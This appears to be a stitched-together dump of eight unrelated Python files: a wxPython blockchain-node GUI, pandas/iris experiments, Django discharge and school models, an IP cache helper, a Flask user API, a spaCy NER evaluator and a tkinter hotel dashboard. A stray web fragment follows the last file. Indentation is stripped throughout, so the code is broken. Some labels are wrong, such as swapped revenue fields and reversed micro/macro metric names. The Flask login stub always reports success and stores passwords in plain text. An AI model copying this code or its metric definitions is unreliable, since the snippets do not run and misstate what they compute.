wx.StaticText(pnl, 1, 'Receiver address', (5, 5), style=wx.LEFT)
receiver_text = wx.TextCtrl(pnl, pos = (5, 25))
wx.StaticText(pnl, 2, 'Amount', (5, 60), style=wx.LEFT)
amount_text = wx.TextCtrl(pnl, pos = (5, 80))
wx.StaticText(pnl, 3, 'Message', (5, 120), style=wx.LEFT)
message_text = wx.TextCtrl(pnl, pos = (5, 140), size = (200, 25))
hbox2 = wx.BoxSizer(wx.HORIZONTAL)
okButton = wx.Button(trx_drg, wx.ID_OK)
hbox2.Add(okButton)
vbox.Add(pnl, proportion=1, flag=wx.ALL | wx.EXPAND, border=5)
vbox.Add(hbox2, flag=wx.ALIGN_CENTER|wx.TOP|wx.BOTTOM, border=10)
trx_drg.SetSizer(vbox)
if trx_drg.ShowModal() == wx.ID_OK:
from SeChainController import FunctionAPIs
# need to validation check (IP format)
FunctionAPIs.send_transaction(receiver_text.GetValue(), amount_text.GetValue(), message_text.GetValue())
trx_drg.Destroy()
else:
print "Node is not started, Start node first"
self.write_console("Node is not started, Start node first")
def deploy_contract(self, event):
if (Property.node_started == True):
trx_drg = wx.Dialog(None, title='Deploying Contract')
trx_drg.SetSize((500, 400))
trx_drg.SetTitle('Sending Transaction')
pnl = wx.Panel(trx_drg)
vbox = wx.BoxSizer(wx.VERTICAL)
wx.StaticText(pnl, 1, 'Receiver address', (5, 5), style=wx.LEFT)
receiver_text = wx.TextCtrl(pnl, pos = (5, 25))
wx.StaticText(pnl, 2, 'Amount', (5, 60), style=wx.LEFT)
amount_text = wx.TextCtrl(pnl, pos = (5, 80))
wx.StaticText(pnl, 3, 'Message', (5, 120), style=wx.LEFT)
message_text = wx.TextCtrl(pnl, pos = (5, 140), size = (200, 25))
wx.StaticText(pnl, 4, 'Source File (ex : Addition)', (5, 180), style=wx.LEFT)
source_text = wx.TextCtrl(pnl, pos = (5, 200), size = (200, 25))
wx.StaticText(pnl, 4, 'Arguments (split by ' ', ex : 1 b)', (5, 240), style=wx.LEFT)
arg_text = wx.TextCtrl(pnl, pos=(5, 260), size=(200, 25))
hbox2 = wx.BoxSizer(wx.HORIZONTAL)
okButton = wx.Button(trx_drg, wx.ID_OK)
hbox2.Add(okButton)
vbox.Add(pnl, proportion=1, flag=wx.ALL | wx.EXPAND, border=5)
vbox.Add(hbox2, flag=wx.ALIGN_CENTER|wx.TOP|wx.BOTTOM, border=10)
trx_drg.SetSizer(vbox)
if trx_drg.ShowModal() == wx.ID_OK:
from SeChainController import FunctionAPIs
contract_source = {'source': source_text.GetValue(), 'args': arg_text.GetValue()}
trx_json = FunctionAPIs.deploy_contract(Property.myNode['public_key'],
Property.myNode['private_key'],
'CT',
receiver_text.GetValue(),
amount_text.GetValue(),
message_text.GetValue(),
contract_source)
trx_drg.Destroy()
else:
print "Node is not started, Start node first"
self.write_console("Node is not started, Start node first")
def run_contract(self, event):
if (Property.node_started == True):
trx_drg = wx.Dialog(None, title='Run Contract')
trx_drg.SetSize((500, 450))
trx_drg.SetTitle('Sending Transaction')
pnl = wx.Panel(trx_drg)
vbox = wx.BoxSizer(wx.VERTICAL)
wx.StaticText(pnl, 1, 'Receiver IP', (5, 5), style=wx.LEFT)
receiver_text = wx.TextCtrl(pnl, pos=(5, 25))
wx.StaticText(pnl, 2, 'Amount', (5, 60), style=wx.LEFT)
amount_text = wx.TextCtrl(pnl, pos=(5, 80))
wx.StaticText(pnl, 3, 'Message', (5, 120), style=wx.LEFT)
message_text = wx.TextCtrl(pnl, pos=(5, 140), size=(200, 25))
wx.StaticText(pnl, 4, 'Contract Address', (5, 180), style=wx.LEFT)
address_text = wx.TextCtrl(pnl, pos=(5, 200), size=(200, 25))
wx.StaticText(pnl, 5, 'Function Name', (5, 240), style=wx.LEFT)
function_text = wx.TextCtrl(pnl, pos=(5, 260), size=(200, 25))
wx.StaticText(pnl, 6, 'Arguments (split by ' ', ex : 1 b)', (5, 300), style=wx.LEFT)
arg_text = wx.TextCtrl(pnl, pos=(5, 320), size=(200, 25))
hbox2 = wx.BoxSizer(wx.HORIZONTAL)
okButton = wx.Button(trx_drg, wx.ID_OK)
hbox2.Add(okButton)
vbox.Add(pnl, proportion=1, flag=wx.ALL | wx.EXPAND, border=5)
vbox.Add(hbox2, flag=wx.ALIGN_CENTER | wx.TOP | wx.BOTTOM, border=10)
trx_drg.SetSizer(vbox)
if trx_drg.ShowModal() == wx.ID_OK:
from SeChainController import FunctionAPIs
contract_data = {'contractAddr': address_text.GetValue(),
'function': function_text.GetValue(),
'args': arg_text.GetValue()}
trx_json = FunctionAPIs.run_contract(Property.myNode['public_key'],
Property.myNode['private_key'],
'RT',
receiver_text.GetValue(),
amount_text.GetValue(),
message_text.GetValue(),
contract_data)
trx_drg.Destroy()
else:
print "Node is not started, Start node first"
self.write_console("Node is not started, Start node first") |
import pandas as pd
df = pd.read_csv("C:/bank-additional-full.csv", sep=";")
df2 = df[:30]
print(df2)
print(type(df2))
df3 = df2['"job"']
###Simple test###
import pandas as pd
df4 = pd.DataFrame({'cid':['c01', 'c02', 'c03'], 'time': [43, 543, 34]})
print(df4)
print(df4['time'])
print(type(df4))
### Iris ###
import pandas as pd
csv = pd.read_csv("C:/Users/Sean/Downloads/iris.csv", encoding="big5")
print(csv.head())
from sklearn.tree import DecisionTreeClassifier
tree = DecisionTreeClassifier(criterion='entropy', max_depth=5)
tree_result = tree.fit(csv[['花萼長度', '花萼寬度', '花瓣長度', '花瓣寬度']], csv[['屬種']])
print(tree_result)
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from json_field import JSONField
from django.db import models
from util.randz import make_8_key
class Discharge(models.Model):
uuid = models.CharField(blank=True, unique=True, max_length=50)
# Message
date = models.DateTimeField(null=True, blank=True)
facility = models.CharField(max_length=100, null=True, blank=True)
diagnosis = models.CharField(max_length=50, null=True, blank=True)
# Patient
patient = models.ForeignKey('patient.Patient')
metadata = JSONField(null=True, blank=True)
# Doctors
attending = models.ForeignKey('provider.Provider', related_name="attending", null=True, blank=True)
referring = models.ForeignKey('provider.Provider', related_name="referring", null=True, blank=True)
def __unicode__(self):
return u"{} ({})".format(
self.patient,
self.date.strftime("%m/%d/%y"))
def save(self, *args, **kwargs):
"""
Ensure unique uuid
"""
if not self.uuid:
uuid = make_8_key()
while Discharge.objects.filter(uuid=uuid).exists():
uuid = make_8_key()
self.uuid = uuid
super(Discharge, self).save(*args, **kwargs)
|
# -*- coding: utf-8 -*-
def is_new_ip(c_key, cache, ip):
aid_ip_pool = cache.get(c_key)
ip_new = True
if aid_ip_pool:
if isinstance(aid_ip_pool, set):
ip_new = ip not in aid_ip_pool
if not aid_ip_pool:
aid_ip_pool = set()
return ip_new, aid_ip_pool
|
from flask import Flask
from flask_restful import Resource, Api
from flask_restful import reqparse
from flask import json
app = Flask(__name__)
api = Api(app)
parser = reqparse.RequestParser()
parser.add_argument('userName')
parser.add_argument('passWord')
parser.add_argument('userArg', location='args')
class User(object):
def __init__(self, userId, userName, passWord, roleId):
self.userId = userId
self.userName = userName
self.passWord = passWord
self.roleId = roleId
userList = []
class UserResource(Resource):
def get(self):
return ([user.__dict__ for user in userList])
def post(self):
args = parser.parse_args()
user = User(1, args['userName'], args['passWord'], 1);
userList.append(user)
#return {'userName' : user.userName }
return user.__dict__
def delete(self):
args = parser.parse_args()
userName = args['userArg']
for user in userList:
if (user.userName == userName):
del userList[userList.index(user)]
break
class Login(Resource):
def post(self):
return {'success' : True}
api.add_resource(Login, '/login')
api.add_resource(UserResource, '/users')
if __name__ == '__main__':
app.run(debug=True, port=5001)
|
import json
import spacy
from test_set_with_placeholder import test_with_placeholder
from test_set_with_placeholder import test_with_placeholder_name_and_surname
from test_set_with_placeholder import test_with_placeholder_common_word
def get_ground_truths(text, ents):
gt = []
for start, end, _ in ents['entities']:
gt.append(text[start:end].lower())
return list(set(gt))
def get_real_value(start, end, text, ents, label_text):
for s, e, _ in ents['entities']:
if s == start and e == end:
return text[start:end].lower()
return label_text
def get_ents_text(doc_ents, text, ents):
ts = []
for e in doc_ents:
start = e.start_char
end = e.end_char
real_value = get_real_value(start, end, text, ents, e.text.lower())
ts.append(real_value)
return list(set(ts))
if __name__ == '__main__':
try:
precisions = []
recalls = []
true_positives = 0
false_positives = 0
false_negatives = 0
nlp = spacy.load('/home/marco/Scrivania/tirocinio-unicredit/news/final_attempt/training_data/sector/model/model-best/')
evaluation_set = test_with_placeholder_common_word(json.load(open('/home/marco/Scrivania/tirocinio-unicredit/news/final_attempt/training_data/sector/test.json')))
c = 0
len_ev_set = len(evaluation_set)
for _, text, ents, pl_text in evaluation_set:
c += 1
print(f"evaluation: {c}/{len_ev_set}")
true_positive = 0
false_positive = 0
false_negative = 0
ground_truths = get_ground_truths(text, ents)
doc = nlp(pl_text)
doc_ents = get_ents_text(doc.ents, text, ents)
if len(doc_ents) == 0:
continue
for doc_ent in doc_ents:
if doc_ent in ground_truths:
true_positive += 1
true_positives += 1
else:
false_positive += 1
false_positives += 1
for gt_ent in ground_truths:
if gt_ent not in doc_ents:
false_negative += 1
false_negatives += 1
precision = true_positive / (true_positive + false_positive)
recall = true_positive / (true_positive + false_negative)
precisions.append(precision)
recalls.append(recall)
micro_precision = sum(precisions) / len(precisions) # average of precision of each document
micro_recall = sum(recalls) / len(recalls) # average of recall of each document
micro_f_measure = (2 * micro_precision * micro_recall) / (micro_precision + micro_recall)
macro_precision = true_positives / (true_positives + false_positives) # precision consider all like one big document
macro_recall = true_positives / (true_positives + false_negatives) # recall consider all like one big document
macro_f_measure = (2 * macro_precision * macro_recall) / (macro_precision + macro_recall)
print(f"Micro - Precision: {round(micro_precision * 100, 1)}% - Recall: {round(micro_recall * 100, 1)}% - F1 Measure: {round(micro_f_measure * 100, 1)}%")
print(f"Macro - Precision: {round(macro_precision * 100, 1)}% - Recall: {round(macro_recall * 100, 1)}% - F1 Measure: {round(macro_f_measure * 100, 1)}%")
except ZeroDivisionError as e:
print()
|
from __future__ import unicode_literals
from django.db import models
# Create your models here.
from django.db import models
class Teacher(models.Model):
first_name=models.CharField(max_length=30)
last_name=models.CharField(max_length=30)
office_details=models.CharField(max_length=60)
phone=models.CharField(max_length=20)
email=models.EmailField()
class Student(models.Model):
first_name=models.CharField(max_length=30)
last_name=models.CharField(max_length=30)
email=models.EmailField()
class Course(models.Model):
name=models.CharField(max_length=30)
code=models.CharField(max_length=60)
classroom=models.CharField(max_length=30)
times=models.TimeField()
students=models.ManyToManyField(Student)
teacher=models.ForeignKey(Teacher)
|
from tkinter import *
import datetime
from folderfinder import findfolder
hotelfolder = findfolder()
import ctypes
import json
user32 = ctypes.windll.user32
screensizex = int(0.2*user32.GetSystemMetrics(0))
screensizey= int(0.4*user32.GetSystemMetrics(1))
root = Tk()
root.geometry(str(screensizex)+"x"+str(screensizey)), root.title('Hotel')
lab = Label(root)
lab.config(text='welcome',font = ('Helvetica',40))
def normalconfig():
lab.config(background='yellow',
font = ('Helvetica',10))
def hotelstats():
with open(hotelfolder + '\\' + 'hoteldata.json', 'r') as f:
hoteldata = json.loads(f.read())
f.close()
totalrooms, totalroomsavb, totalnormal, normalavb, totalsuite, suiteavb, totallux, luxavb, revenue, weekrevenue = \
hoteldata['totalrooms'], hoteldata['normalroomsavb'] + hoteldata['suitesavb'] + hoteldata['luxurysuitesavb'], \
hoteldata['normalrooms'], hoteldata['normalroomsavb'], hoteldata['suites'], hoteldata['suitesavb'], hoteldata[
'luxurysuites'], hoteldata['luxurysuitesavb'], hoteldata['revenue'], hoteldata['lastweekrev']
livedata = ('''
total rooms: {0}
total rooms available: {1}
normal rooms: {2}
normal rooms available: {3}
suites: {4}
suites available: {5}
luxury suites: {6}
luxury suites available: {7}
last week's revenue: {8}
total revenue: {9} '''.format(totalrooms, totalroomsavb, totalnormal,
normalavb, totalsuite, suiteavb, totallux,
luxavb, revenue, weekrevenue))
lab.config(text=livedata,
background='Blue',
font=('Helvetica', 20),
anchor='e')
lab.pack(side=RIGHT, expand=YES, fill=BOTH)
# lab['text'] = time
root.after(3000, hotelstats)
menu = Menu()
exit = Menu(menu)
exit.add_command(label='Exit', command=root.quit)
menu.add_cascade(label= 'Exit', menu= exit)
# run first time
hotelstats()
root.mainloop() |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.